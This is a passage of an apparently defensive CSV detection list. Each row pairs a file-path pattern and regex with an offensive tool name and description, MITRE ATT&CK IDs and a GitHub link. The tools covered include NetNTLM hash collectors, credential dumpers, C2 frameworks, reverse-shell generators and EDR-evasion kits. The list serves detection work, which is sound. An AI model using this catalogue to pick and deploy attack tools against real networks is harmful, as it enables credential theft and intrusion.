causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*\Fertliser.pdb*",".{0,1000}\\Fertliser\.pdb.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*\FileCrawlerMITM.py*",".{0,1000}\\FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\Files\ContainersFileUrls.txt*",".{0,1000}\\Files\\ContainersFileUrls\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\filetransfer.py*",".{0,1000}\\filetransfer\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*\find-computer.py*",".{0,1000}\\find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\firefox\getCredsfirefox.h*",".{0,1000}\\firefox\\getCredsfirefox\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\firefox\getCredsfirefox2.h*",".{0,1000}\\firefox\\getCredsfirefox2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\follina.py*",".{0,1000}\\follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*\Forensike.dmp*",".{0,1000}\\Forensike\.dmp.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\Forensike.ps1*",".{0,1000}\\Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\forensike_results.txt*",".{0,1000}\\forensike_results\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ForkDump.cpp*",".{0,1000}\\ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkDump.exe*",".{0,1000}\\ForkDump\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkDump.vcxproj*",".{0,1000}\\ForkDump\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkLib.cpp*",".{0,1000}\\ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkLib.vcxproj*",".{0,1000}\\ForkLib\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkPlayground.sln*",".{0,1000}\\ForkPlayground\.sln.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\FormatListCommand.cs",".{0,1000}\\FormatListCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\FormatTableCommand.cs",".{0,1000}\\FormatTableCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\freeze.go",".{0,1000}\\freeze\.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan\common\proxy*",".{0,1000}\\fscan\\common\\proxy.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan\WebScan\pocs\*",".{0,1000}\\fscan\\WebScan\\pocs\\.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan32.exe*",".{0,1000}\\fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan64.exe*",".{0,1000}\\fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscanarm64.exe*",".{0,1000}\\fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscanarmv6.exe*",".{0,1000}\\fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscanarmv7.exe*",".{0,1000}\\fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\FtpC2\*",".{0,1000}\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*\FudgeC2*",".{0,1000}\\FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*\FWUprank.ps1",".{0,1000}\\FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\gcloud\application_default_credentials.json*",".{0,1000}\\gcloud\\application_default_credentials\.json.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\geacon\tools\BeaconTool\*",".{0,1000}\\geacon\\tools\\BeaconTool\\.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*\generate_bind_fuegoshell.ps1*",".{0,1000}\\generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*\generate_reverse_fuegoshell.ps1*",".{0,1000}\\generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*\get_netconnections.py*",".{0,1000}\\get_netconnections\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GetADGroupCommand.cs",".{0,1000}\\GetADGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADGroupMemberCommand.cs",".{0,1000}\\GetADGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetAdmin.log*",".{0,1000}\\GetAdmin\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetAdmin.ps1*",".{0,1000}\\GetAdmin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetADObjectCommand.cs",".{0,1000}\\GetADObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADTrustCommand.cs",".{0,1000}\\GetADTrustCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADUserCommand.cs",".{0,1000}\\GetADUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetBrowsers.ps1*",".{0,1000}\\GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\GetChildItemCommand.cs",".{0,1000}\\GetChildItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetClipboardCommand.cs",".{0,1000}\\GetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetCommandCommand.cs",".{0,1000}\\GetCommandCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetComputerInfoCommand.cs",".{0,1000}\\GetComputerInfoCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetContentCommand.cs",".{0,1000}\\GetContentCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\get-desc-users.py*",".{0,1000}\\get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GetDnsClientCacheCommand.cs",".{0,1000}\\GetDnsClientCacheCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetFullPrivs\GetFullPrivs*",".{0,1000}\\GetFullPrivs\\GetFullPrivs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetFullPrivsDrv.cpp*",".{0,1000}\\GetFullPrivsDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetFullPrivsDrv.exe*",".{0,1000}\\GetFullPrivsDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 